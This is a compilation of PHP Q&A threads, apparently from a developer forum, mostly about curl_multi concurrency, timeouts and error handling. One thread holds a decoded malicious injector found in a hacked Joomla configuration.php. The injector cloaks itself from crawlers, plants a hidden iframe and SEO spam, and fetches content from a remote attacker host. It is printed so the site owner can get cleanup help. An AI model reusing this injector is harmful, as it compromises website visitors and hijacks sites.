I'm having trouble getting this code to work. I pulled it from a blog post, and it is based on the WordPress link checker. I have about 6000 URLs in a database whose HTTP status I need to check, so this seemed like a great fit. I've modified the code slightly to suit my needs, and it works (kind of).
I have checked the url_list array throughout the code and it contains all of the URLs. The problem is that execution basically stops after about the 110th row; it's somewhat random, but generally around that number. I'm not sure whether I need to set a timeout somewhere or whether there is a bug in the code. I also noticed that if I set $max_connections greater than 8, it returns a 500 error. Any suggestions?
<?php
// CONFIG
$db_host = 'localhost';
$db_user = 'test';
$db_pass = 'yearight';
$db_name = 'URLS';
$excluded_domains = array();
$max_connections = 7;

$dbh = new PDO("mysql:host=$db_host;dbname=$db_name", $db_user, $db_pass);
$sth = $dbh->prepare("SELECT url FROM list");
$sth->execute();
$result = $sth->fetchAll(PDO::FETCH_COLUMN, 0);

// initialize some variables
$url_list = array();
$working_urls = array();
$dead_urls = array();
$not_found_urls = array();
$active = null;

foreach ($result as $d) {
    // get all links via regex
    if (preg_match_all('#((http?://)?([-\w]+\.[-\w\.]+)+\w(:\d+)?(/([-\w/_\.]*(\?\S+)?)?)*)#', $d, $matches)) {
        foreach ($matches[1] as $url) {
            // store the url
            $url_list[] = $url;
        }
    }
}

// 1. multi handle
$mh = curl_multi_init();

// 2. add multiple URLs to the multi handle
for ($i = 0; $i < $max_connections; $i++) {
    add_url_to_multi_handle($mh, $url_list);
}

// 3. initial execution
do {
    $mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);

// 4. main loop
while ($active && $mrc == CURLM_OK) {
    // 5. there is activity
    if (curl_multi_select($mh) != -1) {
        // 6. do work
        do {
            $mrc = curl_multi_exec($mh, $active);
        } while ($mrc == CURLM_CALL_MULTI_PERFORM);
        // 7. is there info?
        if ($mhinfo = curl_multi_info_read($mh)) {
            // this means one of the requests has finished
            // 8. get the info on the curl handle
            $chinfo = curl_getinfo($mhinfo['handle']);
            // 9. dead link?
            if (!$chinfo['http_code']) {
                $dead_urls[] = $chinfo['url'];
            // 10. 404?
            } elseif ($chinfo['http_code'] == 404) {
                $not_found_urls[] = $chinfo['url'];
            // 11. working
            } else {
                $working_urls[] = $chinfo['url'];
            }
            // 12. remove the handle
            curl_multi_remove_handle($mh, $mhinfo['handle']);
            curl_close($mhinfo['handle']);
            // 13. add a new url and do work
            if (add_url_to_multi_handle($mh, $url_list)) {
                do {
                    $mrc = curl_multi_exec($mh, $active);
                } while ($mrc == CURLM_CALL_MULTI_PERFORM);
            }
        }
    }
}

// 14. finished
curl_multi_close($mh);

echo "==Dead URLs==<br/>";
echo implode("<br/>", $dead_urls) . "<br/><br/>";
echo "==404 URLs==<br/>";
echo implode("<br/>", $not_found_urls) . "<br/><br/>";
echo "==Working URLs==<br/>";
echo implode("<br/>", $working_urls);
echo "<pre>";
var_dump($url_list);
echo "</pre>";

// 15. adds a url to the multi handle
function add_url_to_multi_handle($mh, $url_list) {
    static $index = 0;
    // if we have another url to get
    if (isset($url_list[$index])) {
        // new curl handle
        $ch = curl_init();
        // set the url
        curl_setopt($ch, CURLOPT_URL, $url_list[$index]);
        // prevent the response from being echoed
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        // follow redirects
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        // we do not need the body; this saves bandwidth and time
        curl_setopt($ch, CURLOPT_NOBODY, 1);
        // add it to the multi handle
        curl_multi_add_handle($mh, $ch);
        // increment so the next url is used next time
        $index++;
        return true;
    } else {
        // we are done adding new URLs
        return false;
    }
}
?>
UPDATE:
I have written a bash script that does the same thing as this. Going through the text file the output was written to, I noticed that when the PHP version fails, it is typically around links that return odd HTTP status codes like 000 and 522; some of those requests run for up to 5 minutes! So I am wondering whether the PHP cURL code is stopping execution when it encounters these status codes. It is just a thought, but it might help solve the issue.
1 - This is an execution time issue.
2 - Declaring a max execution time at the top of the code will help this for sure:
bool set_time_limit ( int $seconds )
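Given the update above about requests that hang for minutes on odd status codes, per-handle timeouts are the usual companion to set_time_limit(). A minimal sketch; the 10- and 20-second values are illustrative assumptions, not tuned numbers:

```php
<?php
// let the script itself run as long as the whole crawl needs
set_time_limit(0);

// per-handle timeouts, so a single dead host cannot stall the batch
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 'http://example.com/');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); // seconds allowed to establish the connection
curl_setopt($ch, CURLOPT_TIMEOUT, 20);        // seconds allowed for the entire transfer
```

With options like these set inside add_url_to_multi_handle(), a hanging link fails fast with a timeout error instead of blocking one of the seven connection slots for minutes.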
Related
How can I send a message to more than 50 mobiles at a time? The code below executes, but it takes a long time.
<?php
$sqljobseekers = $con->query("SELECT * FROM users");
$y = mysqli_num_rows($sqljobseekers);
while ($jobseekers = $sqljobseekers->fetch_assoc()) {
    $seekermobile = $jobseekers['emp_mobile'];
    $msg = "Dear Candidate, ." . $job_cmp_name . ". is looking ." . $jobrolename . ". like u, for more details logon www.venkymama.com / www.lifemadeeasyglobal.com";
    $msg = urlencode($msg);
    $sms_file = "http://tra.bulksmshyderabad.co.in/websms/sendsms.aspx?userid=$user&password=$password&sender=atmm&mobileno=" . $seekermobile . "&msg=$msg.";
    $sms_h = fopen($sms_file, "r");
    fclose($sms_h);
}
?>
Instead of looping through your users, making an API call, waiting for a response, and moving on to the next user, why not execute all the calls at the same time?
Take a look into curl_multi_exec. It will allow you to send multiple API calls at the same time. Something similar to this:
<?php
$sqljobseekers = $con->query("SELECT * FROM users");
$y = mysqli_num_rows($sqljobseekers);
$mh = curl_multi_init();
while ($jobseekers = $sqljobseekers->fetch_assoc()) {
    $seekermobile = $jobseekers['emp_mobile'];
    $msg = "Dear Candidate, ." . $job_cmp_name . ". is looking ." . $jobrolename . ". like u, for more details logon www.venkymama.com / www.lifemadeeasyglobal.com";
    $msg = urlencode($msg);
    $sms_file = "http://tra.bulksmshyderabad.co.in/websms/sendsms.aspx?userid=$user&password=$password&sender=atmm&mobileno=" . $seekermobile . "&msg=$msg.";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $sms_file);
    // capture the gateway response instead of echoing it
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_multi_add_handle($mh, $ch);
}
$active = null;
// execute the handles
do {
    $mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active && $mrc == CURLM_OK) {
    if (curl_multi_select($mh) != -1) {
        do {
            $mrc = curl_multi_exec($mh, $active);
        } while ($mrc == CURLM_CALL_MULTI_PERFORM);
    }
}
?>
I'm working with multi cURL and was wondering how to handle errors. I want to check which error occurred, and if it is something like a rate limit being exceeded, I want to crawl that link again after some delay (sleep()). My question: is there a built-in function that can do this for me, or do I need to collect all the URLs in an array and just run those again?
This is what I've got now:
<?php
$urls = array("https://API-URL.com",
              "https://API-URL.com",
              "https://API-URL.com",
              "https://API-URL.com",
              ...);
// create the multiple cURL handle
$mh = curl_multi_init();
// number of elements in $urls
$nbr = count($urls);
// set URL and options
for ($x = 0; $x < $nbr; $x++) {
    // create a cURL resource for each URL
    $ch[$x] = curl_init();
    // set URL and other appropriate options
    curl_setopt($ch[$x], CURLOPT_URL, $urls[$x]);
    curl_setopt($ch[$x], CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch[$x], CURLOPT_SSL_VERIFYPEER, false);
    // add the handle
    curl_multi_add_handle($mh, $ch[$x]);
}
// execute the handles
do {
    curl_multi_exec($mh, $running);
} while ($running);
for ($x = 0; $x < $nbr; $x++) {
    $result = curl_multi_getcontent($ch[$x]);
    $decoded = json_decode($result, true);
    // get the HTTP status code of the request
    $error = curl_getinfo($ch[$x], CURLINFO_HTTP_CODE);
    // error handling
    if ($error != 200) {
        $again[] = array("Url" => $urls[$x], "errornbr" => $error);
    } else {
        // here I do whatever I want with the data
    }
    curl_multi_remove_handle($mh, $ch[$x]);
    curl_close($ch[$x]);
}
curl_multi_close($mh);
?>
For multiple handles there is curl_multi_info_read():
https://www.php.net/manual/en/function.curl-multi-info-read.php
so the error check (assuming an HTTP connection) should look like this:
while ($a = curl_multi_info_read($mh))
{
if ($b = $a['result'])
{
echo curl_strerror($b);# CURLE_* error
}
elseif (!($b = curl_getinfo($a['handle'], CURLINFO_RESPONSE_CODE)))
{
echo 'connection failed';
}
elseif ($b !== 200)
{
echo 'HTTP status is not 200 OK';
}
}
Consider this code as pseudo-code for modern PHP versions (I didn't test this exact variant, but the scheme works). Calling curl_errno() on "easy" handles added to a "multi" handle returns 0, which is not an error.
In the second for-loop, where you cycle through the cURL handles to examine what each one returned, I hope this approach will answer your question:
foreach ($ch as $key => $h) {
    // This checks for any error that may have occurred; whatever that
    // error is, you can handle it in the if-branch and save those
    // URLs to the $again array to call them again at a later stage.
    if (curl_errno($h)) {
        // This is how you get complete information on what happened to the
        // handle and why it failed; it is all stored under "error_info".
        $again[] = array("Url" => curl_getinfo($h, CURLINFO_EFFECTIVE_URL), "error_info" => curl_getinfo($h));
    } else {
        // here you handle the success scenario for each handle
        $responses[$key] = ['data' => curl_multi_getcontent($h)];
    }
    // remove the curl handle as you are doing in the loop
}
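There is no built-in retry in the multi-cURL API, so the usual pattern is to collect the failures (as in the $again array above) and re-queue them after a delay. A hedged sketch, where the should_retry() helper and its choice of status codes are illustrative assumptions:

```php
<?php
// decide whether an HTTP status is worth retrying
// (429 = rate limited, 5xx = transient server errors)
function should_retry($httpCode) {
    return $httpCode == 429 || ($httpCode >= 500 && $httpCode < 600);
}

// filter the collected failures down to the retryable ones,
// assuming entries shaped like array("Url" => ..., "errornbr" => ...)
function retryable_urls(array $again) {
    $urls = array();
    foreach ($again as $entry) {
        if (should_retry($entry["errornbr"])) {
            $urls[] = $entry["Url"];
        }
    }
    return $urls;
}
```

You would then sleep() for a bit and feed retryable_urls($again) back through the same multi-cURL loop.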
For a week I have been trying to log in to the back-end of my Joomla 1.5 site. It simply keeps coming back to the login page without any error. When I took a look at the configuration.php file, it appeared as a string encoded with the following pattern:
<?php eval(base64_decode('string here')); ?>
When I decoded it using an online service, this is what it turned out to be:
if (!defined('frmDs')){ define('frmDs' ,1); function frm_dl ($url) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $out = curl_exec ($ch); if (curl_errno($ch) !== 0) $out = false; curl_close ($ch); } else {$out = #file_get_contents($url);} return trim($out); } function frm_crpt($in){ $il=strlen($in);$o=''; for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*'; return $o; } function frm_getcache($tmpdir,$link,$cmtime,$del=true){ $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link)); if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime) { $dlc=frm_dl($link); if($dlc===false){ if(del) #unlink($f); else #touch($f); } else { if($fp = #fopen($f,'w')){ fwrite($fp, frm_crpt($dlc)); fclose($fp); }else{return $dlc;} } } $fc = #file_get_contents($f); return ($fc)?frm_crpt($fc):''; } function frm_isbot($ua){ if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296; $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590), array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566), array(3481178113,3481182206),array(2915172353,2915237886)); foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true; if(!$ua)return true; $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; return false; } function frm_tmpdir(){ $fs = array('/tmp','/var/tmp'); foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs[]='.'; foreach ($fs as $f){ $tf = $f.'/'.md5(rand()); if($fp = #fopen($tf, 'w')){ fclose($fp); unlink($tf); return $f; } } return false; } function frm_seref(){ $r = #strtolower($_SERVER["HTTP_REFERER"]); $ses = array('google','bing','yahoo','ask','aol'); foreach ($ses as $se) 
if(strpos($r, $se.'.')!=false) return true; return false; } function frm_isuniq($tdir){ $ip=$_SERVER['REMOTE_ADDR']; $dbf=$tdir.'/sess_'.md5(date('m.d.y')); $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400)); if (file_exists($odbf)) #unlink($odbf); if(strpos(frm_crpt(#file_get_contents($dbf)),$ip) === false ){ if ($fp=#fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);} return true; } return false; } $tdir = frm_tmpdir(); $defframe = '<style> .gtvvh { position:absolute; left:-760px; top:-927px; }</style><div class="gtvvh"><iframe src="http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.latest.js" width="477" height="435"></iframe></div>'; $defrdg='http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.js'; $codelink = 'http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.latest.js'; $rdglink='http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.js'; $ua=$_SERVER['HTTP_USER_AGENT']; $isb=frm_isbot($ua); if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){ error_reporting(0); if(!isset($_COOKIE['__utmfr'])) { if(!$codelink) print($defframe); else print(frm_getcache($tdir,$codelink,15)); #setcookie('__utmfr',rand(1,1000),time()+86400*7,'/'); } } //------- $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST'])); if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){ $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host)))),0,3); $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0; $ruri = strtolower($_SERVER['REQUEST_URI']); if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){ print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*48,false)); exit(); } if ($isb) { error_reporting(0); print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&pa=$parg&g=".(($ruri=='/'||$ruri=='/index.php')?'1':'0'),60*48,false)); } 
} //---------}
I checked the other Joomla installations on my hosting space and all of their configuration.php files are the same.
What should I do?
Please help.
The only thing the configuration.php file should contain is defined variables. Nothing else. It could very well be that someone has hacked your site and messed around with your files.
Change all passwords that are related to your website, including the hosting one.
Take a backup of your site via cPanel and scan it with some antivirus software. Assuming there are no viruses detected, upgrade your site to the latest release of the Joomla 2.5 series (2.5.14).
Then, remove the code you showed in your question from the configuration.php file and try logging back into the Joomla admin panel. If it works, ensure all your extensions are up to date and read this:
Joomla! 2.5.4 Hacked: Having trouble with diagnosis.
If not, then try resetting your super user password via the database:
http://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F
UPDATE:
It seems your whole configuration.php file has been attacked. I have provided you with the code for the file; however, there are some blank spaces to be filled in. Anything that does need filling in, I have noted next to it:
http://pastebin.com/gWWtCAJR
Let me know how it goes :)
I use multi cURL to retrieve some pages, from 1 to 200.
The problem is that the first links from the list always come back empty!
I don't understand why!! O_o
$mh = curl_multi_init();
for ($j = 0; $j < $i; $j++) {
    $ch[$j] = curl_init($Links[$j]);
    curl_setopt($ch[$j], CURLOPT_CONNECTTIMEOUT, $curlConTimeOut);
    curl_setopt($ch[$j], CURLOPT_TIMEOUT, $curlTimeOut);
    curl_setopt($ch[$j], CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch[$j], CURLOPT_MAXREDIRS, 3);
    curl_setopt($ch[$j], CURLOPT_FOLLOWLOCATION, 1);
    curl_multi_add_handle($mh, $ch[$j]);
}
$active = null;
do {
    $mrc = curl_multi_exec($mh, $active);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($active && $mrc == CURLM_OK) {
    if (curl_multi_select($mh) != -1) {
        do {
            $mrc = curl_multi_exec($mh, $active);
        } while ($mrc == CURLM_CALL_MULTI_PERFORM);
    }
}
$Si = 0; $Fi = 0; $Disp = "";
for ($j = 0; $j < $i; $j++) {
    if ($ch[$j]) {
        if (curl_multi_getcontent($ch[$j]) == null) {
            $Disp .= '0';
            $Fi++;
        } else {
            $Disp .= '1';
            $Si++;
        }
        curl_multi_remove_handle($mh, $ch[$j]);
        curl_close($ch[$j]);
    }
}
curl_multi_close($mh);
$Si / $Fi / $Disp are just for testing; an example result is:
Link Success: 65/161
Link Failed : 96/161
Disp: 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111111111111111101111110011111111001111111111111111111111111111111111
Where 0 is failed and 1 is success; if the Nth element is 0, it means the Nth link returned NULL.
It can't be that, every time, only the initial elements return null!! What are the odds?!
I checked curl_error() for them, and they all report "Connection timed out after XXXXX milliseconds":
1st: 13852 milliseconds
2nd: 13833 milliseconds
...
12676 ms
...
10195
...
and it continues down to 6007 ms, after which the successful ones start!
CURLOPT_CONNECTTIMEOUT IS SET TO 6 sec!
Why does it start every time from a higher number, go down to 6, and then come back right? O_o
I want to underline that the order of the null responses depends only on the list, not on the multi-cURL response times!
Another example with fewer links:
| Link Success: 30/52
| Link Failed : 22/52
| Disp: 0000000000000000000001111111111011111111111111111111
As you can see, when you execute/request less content/fewer pages, you hit the 1s faster (1 is success and 0 is error).
As I understand it from what you describe, your first requests hit a timeout. My guess is that you need to lower the number of requests executed at a time. Let's say you execute 5, get the values, and then do the next 5.
5 is just a number I picked, so test which number is better for you. It can be bigger if your processor can handle more at the same time, but it is also limited by how fast the other side of the internet responds.
Hope it helps.
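A minimal sketch of that batching idea; the fetch_batch() helper, the batch size of 5, and the 6-second connect timeout are assumptions for illustration, not tested values:

```php
<?php
// fetch one batch of URLs through its own multi handle and
// return the response bodies (false/empty where a transfer failed)
function fetch_batch(array $batch) {
    $mh = curl_multi_init();
    $handles = array();
    foreach ($batch as $url) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 6);
        curl_multi_add_handle($mh, $ch);
        $handles[] = $ch;
    }
    // run this batch to completion before starting the next one
    do {
        $mrc = curl_multi_exec($mh, $active);
        if ($active) {
            curl_multi_select($mh);
        }
    } while ($active && $mrc == CURLM_OK);
    $results = array();
    foreach ($handles as $ch) {
        $results[] = curl_multi_getcontent($ch);
        curl_multi_remove_handle($mh, $ch);
        curl_close($ch);
    }
    curl_multi_close($mh);
    return $results;
}

// usage, assuming $Links holds the full URL list:
// foreach (array_chunk($Links, 5) as $batch) {
//     $results = fetch_batch($batch);
//     // ... count successes/failures per batch here
// }
```

Because each batch only opens 5 connections, no request has to queue behind 200 simultaneous connects, which is what appears to be eating into the 6-second connect timeout above.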
This is a loop used in our script with cURL. It's causing CPU usage to shoot up to 100%. A friend said, "Your computer is looping so fast here that it doesn't have time to process the request, since it is constantly checking for a finish." So my question is: how can this loop be rewritten to slow down? Thanks
$running = null;
do {
curl_multi_exec($mh, $running);
} while($running > 0);
Try this: http://php.net/manual/function.curl-multi-select.php
Adding a call to http://php.net/sleep or http://php.net/usleep in every iteration should reduce the CPU usage by allowing other running processes to be scheduled by the operating system.
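A minimal illustration of that suggestion; the 10 ms pause is an arbitrary value, and waiting on curl_multi_select() is generally preferable to a fixed sleep:

```php
<?php
$mh = curl_multi_init();
// ... add easy handles here ...
$running = null;
do {
    curl_multi_exec($mh, $running);
    // yield the CPU briefly instead of spinning flat out
    usleep(10000); // 10 ms; an arbitrary choice
} while ($running > 0);
curl_multi_close($mh);
```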
Unfortunately you didn't post your whole code. I suppose you are doing something like this:
$mh = curl_multi_init();
for ($i = 0; $i < $desiredThreadsNumber; $i++) {
$ch = curl_init();
// set up $ch here
curl_multi_add_handle($mh, $ch);
}
You should understand that you haven't actually run the threads yet here. curl_multi_exec() runs all the threads, but it can't run all $desiredThreadsNumber of them simultaneously. If you look at the example on the curl_multi_exec() php.net page, you will see that you must wait while curl_multi_exec() runs all the threads. In other words, you need this nested loop:
$running = null;
do {
do {
$mrc = curl_multi_exec($mh, $running);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
} while($running > 0);
Finally, let me suggest that you read this article http://www.onlineaspect.com/2009/01/26/how-to-use-curl_multi-without-blocking/ and use the code snippet from there; I have used it in 2 or 3 projects.
curl_multi_select (http://php.net/manual/function.curl-multi-select.php) is indeed the way to go, but there are a couple caveats.
First, if curl_multi_exec returns CURLM_CALL_MULTI_PERFORM, it has more data to be processed immediately, so should be run again. Also, it is important to check that curl_multi_exec did not fail immediately; in that case curl_multi_select could block forever.
This should work:
do {
while (CURLM_CALL_MULTI_PERFORM === curl_multi_exec($mh, $running)) {};
if (!$running) break;
while (curl_multi_select($mh) === 0) {};
} while (true);
If anyone sees a good way to avoid the while(true) without duplicating code, please point it out.
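For what it's worth, one way to drop the while(true) is to fold the $running check into the loop condition itself. An untested sketch along the same lines:

```php
<?php
$mh = curl_multi_init();
// ... add easy handles here ...
$running = null;
do {
    // drive the transfers; repeat while curl wants to be called again immediately
    while (CURLM_CALL_MULTI_PERFORM === curl_multi_exec($mh, $running));
    // wait for socket activity instead of spinning
    if ($running) {
        curl_multi_select($mh);
    }
} while ($running);
curl_multi_close($mh);
```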
I tried all the solutions provided above, but this one worked for me on a highly loaded system where more than 1k multi-cURL requests are made every second.
// execute the handles
$running = null;
do {
    $mrc = curl_multi_exec($mh, $running);
} while ($mrc == CURLM_CALL_MULTI_PERFORM);
while ($running && $mrc == CURLM_OK) {
    if (curl_multi_select($mh) == -1) {
        usleep(1);
    }
    do {
        $mrc = curl_multi_exec($mh, $running);
    } while ($mrc == CURLM_CALL_MULTI_PERFORM);
}
Try:
$running = null;
do {
do {
$mrc = curl_multi_exec($mh, $running);
} while ($mrc == CURLM_CALL_MULTI_PERFORM && curl_multi_select($mh) === 0 );
} while($running > 0 && $mrc == CURLM_OK );
You could add sleep(1), which sleeps for one second, into the loop.